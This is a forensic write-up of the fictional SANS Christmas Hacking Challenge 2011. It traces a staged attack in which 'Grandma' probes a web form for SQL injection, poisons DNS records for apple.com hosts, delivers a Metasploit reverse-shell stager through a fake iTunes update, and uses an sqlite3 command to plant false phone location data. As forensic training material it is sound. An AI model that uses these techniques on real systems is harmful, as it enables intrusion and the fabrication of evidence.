SANSChristmas Hacking Challenge 2011

Johnny Vestergaardjkv@unixcluster.dk

January 3, 2012

Contents

1 Overview 21.1 Significant events . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 21.2 Attack visualization . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2

2 Analysis 32.1 Hosts analysis . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3

2.1.1 IP 192.168.1.10 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 32.1.2 IP 172.19.79.2 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 32.1.3 IP 172.19.89.6 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 4

2.2 Detailed analysis . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 52.2.1 #1 - Email from Grandma to Mel . . . . . . . . . . . . . . . . . . 52.2.2 #2 - Probing of web server . . . . . . . . . . . . . . . . . . . . . . 62.2.3 #3 - SQL injection (DNS Poisoning) . . . . . . . . . . . . . . . . . 72.2.4 #4 - Infection of Rudolphs computer . . . . . . . . . . . . . . . . . 10

3 Answers to challenge questions 14

1

1 Overview

1.1 Significant events

Table 1 provides a summarization of the most significant events identified and analyzedon the following pages.

# Time Event1 13:51 Email from Grandma to Mel revealing a plot to frame Rudolph of her murder,

mail has hidden content which reveals Grandma’s current location.2 13:51 Probing of Web server, attacker finds that the server is vulnerable to SQL

injection (source 192.168.1.10)3 13:52 SQL injection on web server, injections of data which results in specific

apple.com hosts resolving to 192.168.1.10. (DNS poisoning)4 13:57 Rudolph computer tries to update iTunes, but due to DNS poisoning is

redirected to a service provided by the attacker which servers a piece ofmalware used by the attacker inject a set of coordinates (40.7715,-73.978833)into a backup of Rudolph’s cellular phone..

Table 1: Significant events

1.2 Attack visualization

Based on the analysis in section 2 the following visualization has been generated - thisvisualization is pretty self explanatory and is included as an easy way to grasp how theattack were orchestrated.

Attacker192.168.1.10(Grandma)

Mail Server192.168.1.3

Mail with hidden content(Grandma -> Mel)

DNS andWeb Server172.19.79.2

DNS poisoning(sql injection)

Target172.19.79.6(Rudolph)

Change iPhone coordinates

Delete sqlite.exe

Get iTunesUpdate

Reverse shell

Get sqlite.exe (ftp)

Uses DNS

Figure 1: Attack visualization

2

2 Analysis

An in-depth analysis of the most significant hosts and events found in the provided packetdump.

2.1 Hosts analysis

Form, identify and miscellaneous information on the most prominent hosts active in thepacket dump, this provides a reference point for further analysis done in 2.2.

2.1.1 IP 192.168.1.10

Accordingly to headers extracted from email and http this host appears to be running aLinux i686 variant as OS, using Firefox as a browser (See snippet 1: line 2 and 3) andAlpine as email client. Furthermore it appears that the operator using 192.168.1.10 is do-ing so using a administrative account (root) and that the operator is know as “Grandma”(See snippet 2: line 2, 3, 4 and 5).

Snippet 1 HTTP client headers from 192.168.1.0

1 GET / HTTP/1.12 Host: www.santaslist.northpole3 User!Agent: Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1

Snippet 2 Email headers from 192.168.1.10

1 Date: Sun, 25 Dec 2011 07:42:26 !0500 (EST)2 From: Grandma <root@grandma.gma>3 X!X!Sender: root@bt4 To: cousinmel@mail.gma5 Subject: Christmas6 Message!ID: <alpine.DEB.2.02.1112250741440.7396@bt>7 User!Agent: Alpine 2.02 (DEB 1266 2009!07!14)8 MIME!Version: 1.09 Content!Type: MULTIPART/MIXED; BOUNDARY="0!471592043!1324816946=:7396"

2.1.2 IP 172.19.79.2

Web server serving www.santaslist.northpole, running Apache 2.2.15 on CentOS andusing PHP 5.3.2. (See snippet 3).

Snippet 3 HTTP headers from webserver www.santaslist.northpole

1 HTTP/1.1 200 OK2 Date: Sun, 25 Dec 2011 12:52:58 GMT3 Server: Apache/2.2.15 (CentOS)4 X!Powered!By: PHP/5.3.2

3

2.1.3 IP 172.19.89.6

Accordingly to headers(see snippet 4) extracted from HTTP requests this system isrunning Windows XP Professional SP3 and have an outdated version of iTunes installed(10.3.1), furthermore path-naming and username information were foud which indicatesthat the owner of this system is named Rudolph as shown in snippet 5.

Snippet 4 HTTP header from 172.19.89.6

1 GET /bag.xml?ix=4 HTTP/1.12 User!Agent: iTunes/10.3.1 (Windows; Microsoft Windows XP Professional Service Pack 3 (Build 2600))

AppleWebKit/533.21.1

Snippet 5 Indications of identify on 172.19.89.6

1 C:\Documents and Settings\Rudolph\Application Data\Apple Computer\MobileSync\Backup\e409a4c01ece2a9e6bf9267b169f3b15616b98cd>ftp !A 192.168.1.10

2 [...]3 Anonymous login succeeded for Rudolph@RUDOLPH!PC

4

2.2 Detailed analysis

This section will prove a detailed analysis of each significant event as listed in table 1 onpage 2.

2.2.1 #1 - Email from Grandma to Mel

At 13:51 an email was sent from Grandma to Mel, this mail appears at first looks tocontain only a mail message (snippet 6) and a MIME embedded work document (contentshown in 7), however during forensic analysis of the word document a hidden messagesfrom Grandma were detected in the comment property of the metadata a!liated withthe word document as shown in snippet 8.

Snippet 6 Text content of mail from Grandma to Rudolph

1 Dear Mel,2

3 Our plans are almost complete, and I am very excited. Soon, you and I4 shall be spending the rest of our days relaxing in the surf and sun!5 The plan is highly sensitive, a deep secret that only the two of us share.6 Never tell another soul about our clever scheme as long as you live.7 As we discussed, I recently made you the sole beneficiary of my life8 insurance policy. On Christmas Eve, I plan on faking my own death, which9 I will frame as murder on Rudolph, Santas obnoxious reindeer.

10

11 The details of my plan are included in the attached document below. Read12 it carefully.13

14 Merry Christmas!15

16 Grandma

5

Snippet 7 Content of attached file in mail from Grandma to Mel

1 Dear Mel,2

3 Here are the details of my secret plan.4

5 After the investigation turns up the evidence I plant, you provide eyewitness testimony in court, and6 Rudolph is convicted, you will receive the insurance payout. We can then use that money to fund our7 Caribbean retirement.8

9 I am not sure I ever told you this, Mel, but as a child, my village was attacked by a ravenous band of10 rampaging reindeer, instilling a life!long hatred in me for the flea!bitten beasts. Ill never forget11 their horrible comments as they galloped through our village. Because of that chilling childhood12 experience, Im going to fake my death and blame it all on Rudolph, the most well!known reindeer of all.13 Hell rot away in jail forever.14

15 Merry Christmas,16

17 Grandma

Snippet 8 Message hidden in file comment of attached file

1 I will hide out at the Plaza Hotel near Central Park for several weeks, and meet you there in the lobby2 exactly one week after the trial concludes with a guilty verdict for Rudolph, precisely at noon local3 time. Make sure you bring the money in a suitcase full of cash. Ill be wearing one red shoe.

2.2.2 #2 - Probing of web server

Soon after issuing the mail previously mentioned, the attacker launched a series of probeson a web server (172.19.79.2). Initially the attacker issued a few HTTP probes, shownin snippet 9, the purpose of these probes is assessed to be information gathering andidentification of vulnerabilities. The attacker successfully identified a SQL injection vul-nerability by injecting a single quote (hex value 27) as a value to the name parameterin the naughty list form, the server response suggesting this vulnerability is shown insnippet 10.

6

Snippet 9 Generic probing• GET / HTTP/1.1

• POST /checklist.php HTTP/1.1

– name=Grandma

– name=Cousin+Mel

– name=%27

Snippet 10 SQL Injection probe

1 HTTP/1.1 200 OK2 Date: Sun, 25 Dec 2011 12:53:28 GMT3 Server: Apache/2.2.15 (CentOS)4 <!! CUT !!>5 <tr><th>Name</th><th>Status</th></tr>6 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version

for the right syntax to use near ’’’’’ at line 1</table>7 </body></html>

2.2.3 #3 - SQL injection (DNS Poisoning)

The attacker starts out by injecting a few SELECT queries to identify the data andschema already stored in the database, the results are displayed enumerated in thenaughty list as shown in figure 2 on the next page, after a few queries the attacker is ableto reconstruct the relevant parts of the DNS database as shown in table 2a on page 9. Theattacker then injects a single Start of Authority (SOA) record in the MYDNS.soa stat-ing that the origin apple.com is best resolved at ns1.santaslist.northpole, which in plainenglish states that ns1.santaslist.northpole is the best place to lookup *.apple.com hostnames. Lastly a series of apple.com hosts are injected into the Resource Record (RR)table stating that the specified hosts resolved to 192.168.1.10 - again in plain Englishthis states that when a client lookups one of the injected hostsname they will resolve to192.168.1.10 - which is the IP of the attacker. A full overview of the SOA and RR tablesafter the attacker successfully has conducted his DNS poisoning is shown in table 2b onpage 9.

7

Figure 2: HTML feedback after SQL injection of SELECT statement

8

Original soa TableID O

RIG

IN

NS

MB

OX

SER

IAL

RE

FR

ESH

RE

TR

Y

EX

PIR

E

MIN

IMU

M

TT

L

1 santaslist.northpole ns1.santaslist.northpole root.santaslist.northpole 25 2880

0

7200

6048

00

8640

0

8640

0

Original rr TableID ZONE NAME TYPE DATA AUX TTL

1 1 @ NS ns1.santaslist.northpole 0 86400

2 1 ns1.santaslist.northpole A 172.19.79.2 0 86400

3 1 www.santaslist.northpole A 172.19.79.2 0 86400

(a) DNS tables before SQL injection

Modified soa Table

ID OR

IGIN

NS

MB

OX

SER

IAL

RE

FR

ESH

RE

TR

Y

EX

PIR

E

MIN

IMU

M

TT

L

1 santaslist.northpole ns1.santaslist.northpole root.santaslist.northpole 25 2880

0

7200

6048

00

8640

0

8640

0

2 apple.com ns1.santaslist.northpole root.santaslist.northpole 1 2880

0

7200

6048

00

8640

0

8640

0

Modified rr TableID ZONE NAME TYPE DATA AUX TTL

1 1 @ NS ns1.santaslist.northpole 0 86400

2 1 ns1.santaslist.northpole A 172.19.79.2 0 864003 1 www.santaslist.northpole A 172.19.79.2 0 864004 2 itunes.apple.com A 192.168.1.10 864005 2 ax.init.itunes.apple.com A 192.168.1.10 864006 2 swcatalog.apple.com A 192.168.1.10 864007 2 swcdn.apple.com A 192.168.1.10 864008 2 swscan.apple.com A 192.168.1.10 86400

(b) DNS tables after SQL injection

Table 2: DNS tables before and after malicious modification.

9

2.2.4 #4 - Infection of Rudolphs computer

The infection processThe target is infected through a malicious iTunes update, the attacker has made arrange-ments as described in 2.2.3 to make specific apple.com hosts resolve to his own machine(192.168.1.10) where he is hosting a malicious update service serving malware insteadof legit updates - it is likely that the attacker is using EvilGrade1 (or a similar tool) tofacilitate this. The requests from the target’s iTunes instance to the malicious updateservice are shown in table 3. An analysis of the tra!c has shown that the target is usingan old version of iTunes (10.3.1) which is vulnerable2 to this specific attack vector whichallows download and execution of unsigned updates.

Client request Intended hostGET /bag.xml?ix=4 ax.init.itunes.apple.com

GET /version?machineID=101a1a42c676ea68 itunes.apple.comGET /content/catalogs/others/index-windows-1.sucatalog swcatalog.apple.com

GET /content/downloads/14/21/[SNIP]/061-4339.English.dist swcatalog.apple.comGET /iTunesSetup.exe swcatalog.apple.com

Table 3: Update requests

The malwareAfter execution of the malware, the malware tries to connect back to the attacker on port1225 using a standard TCP three way handshake - after the connection is established themalware seemingly awaits stimulus before acting further, this stimulus was captured inthe provided PCAP show in figure 3 on the following page, when comparing this stim-ulus with the shell.rb source code of Metasploit, as shown in figure 4 on the next page,it can be concluded with little doubt that the malware is a legit binary3 wrapped with aMetasploit reverse_tcp stager - and that the actual staging used by attacker is a shell.

1http://www.infobytesec.com/down/isr-evilgrade-Readme.txt2Fixed in 10.5.1 http://support.apple.com/kb/HT5030?viewlocale=en_US3Apache Bench - found by static analysis of the binary.

10

Figure 3: Malware stimulus (blue is attacker data, red is target data)

Figure 4: Metaspoit source code (/modules/payloads/stages/windows/shell.rb)

A test was conducted in an isolated environment using two hosts - a Windows XP SP3running the malware (extracted from the PCAP) and Backtrack 5R2 running Meatas-

11

ploit. As shown in figure 5 the test demonstrated that the malware actually works asdescribed above.

Figure 5: Injection of shell payload.

Modification of coordinates on Rudolph’s computer.At this point the attacker has shell access to Rudolph’s computer where he downloadsa copy of sqlite3.exe from his own machine. The attacker uses this tool to inject a setof coordinates into a backup of Rudolph’s phones cellular location database which isstored locally on Rudolph’s computer. The coordinates and timing injected matches thecrime-scene4, as shown in figure 6 on the following page, - which would lead a forensicinvestigator to the conclusion that Rudolph, or at least his phone, was at the crime-scenewhen the alleged crime occurred.

Snippet 11 Command used to inject data

1 sqlite3 4096c9ec676f2847dc283405900e284a7c815836 "insert into CellLocation values(310,410,11250,116541837,346471200.820172,40.7715,!73.978833,1414,0,!1,!1,!1,50)"

The manipulated celluar location database is shown in snippet 12 on the next page(theinjected data is shown on line 23).

4Crime-scene coordinates was extracted from the photo of the crimescene - http://pen-testing.sans.org/images/challenges/holiday/evidence.jpg

12

Snippet 12 Location database after malicious modification

1 310|410|11504|165415283|346413600.207493|90.0|0.0|1414.0|0.0|!1.0|!1.0|!1.0|502 310|410|11560|165415876|346417200.724667|!36.848461|174.763333|1414.0|0.0|!1.0|!1.0|!1.0|503 310|410|11913|165415988|346424400.845503|!33.87365|151.206889|1414.0|0.0|!1.0|!1.0|!1.0|504 310|410|11490|165415931|346431600.789114|35.689489|139.691706|1414.0|0.0|!1.0|!1.0|!1.0|505 310|410|11486|165415119|346433400.698928|40.332808|116.47765|1414.0|0.0|!1.0|!1.0|!1.0|506 310|410|11387|165415444|346435200.577698|39.904214|116.407414|1414.0|0.0|!1.0|!1.0|!1.0|507 310|410|11647|165415648|346449600.307924|55.752505|37.623168|1414.0|0.0|!1.0|!1.0|!1.0|508 310|410|11563|165415337|346458600.605536|52.523406|13.4114|1414.0|0.0|!1.0|!1.0|!1.0|509 310|410|11293|165419827|346460400.123529|48.858362|2.294242|1414.0|0.0|!1.0|!1.0|!1.0|50

10 310|410|11245|165415050|346464000.957372|51.505624|!0.075383|1414.0|0.0|!1.0|!1.0|!1.0|5011 310|410|11341|165413757|346471200.820172|!22.903539|!43.209587|1414.0|0.0|!1.0|!1.0|!1.0|5012 310|410|11146|165413900|346478400.428421|18.467964|!66.108809|1414.0|0.0|!1.0|!1.0|!1.0|5013 310|410|11150|165413038|346480200.261264|6.42375|!66.58973|1414.0|0.0|!1.0|!1.0|!1.0|5014 310|410|11342|165415572|346482000.116289|40.748245|!73.985534|1414.0|0.0|!1.0|!1.0|!1.0|5015 310|410|11880|165413161|346483440.664151|43.653226|!79.383184|1414.0|0.0|!1.0|!1.0|!1.0|5016 310|410|11537|165415788|346484520.528258|40.440625|!79.995886|1414.0|0.0|!1.0|!1.0|!1.0|5017 310|410|11363|165415476|346485600.313375|41.8789|!87.63584|1414.0|0.0|!1.0|!1.0|!1.0|5018 310|410|11686|165413799|346489201.224764|39.739094|!104.984898|1414.0|0.0|!1.0|!1.0|!1.0|5019 310|410|11998|165414519|346492800.167865|37.819751|!122.478168|1414.0|0.0|!1.0|!1.0|!1.0|5020 310|410|11312|165413083|346496400.422522|61.190009|!149.870694|1414.0|0.0|!1.0|!1.0|!1.0|5021 310|410|11409|165413229|346500000.268656|21.307237|!157.858055|1414.0|0.0|!1.0|!1.0|!1.0|5022 310|410|11504|165415284|346503600.473327|90.0|0.0|1414.0|0.0|!1.0|!1.0|!1.0|5023 310|410|11250|116541837|346471200.820172|40.7715|!73.978833|1414.0|0.0|!1.0|!1.0|!1.0|50

Figure 6: Plot of injected coordinate and crime-scene. (green arrow - same location)

13

3 Answers to challenge questions

According to the packet capture file, what was Grandma’s grand plan forChristmas day?Fake her own death and frame Rudolph of her disappearance.

Why did the geo-location information on Rudolph’s computer, synced from his cellphone, show that Rudolph was in Central Park during the attack? Please describeeach technical step that lead to this "evidence" presented in court.Grandma, the über hacker, hacked Rudolph’s computer and injected a set of coordinatesinto a software backup of Rudolph’s cellular phone. The technical steps are described insection 2.2.

Where should the authorities look for Grandma?In Plaza Hotel near Central Park, see snippet 8 on page 6.

Based on the evidence in the packet capture file, who is guilty in this story?Dear old Grandma is guilty of framing Rudolph of her disappearance and insurance fraud.

14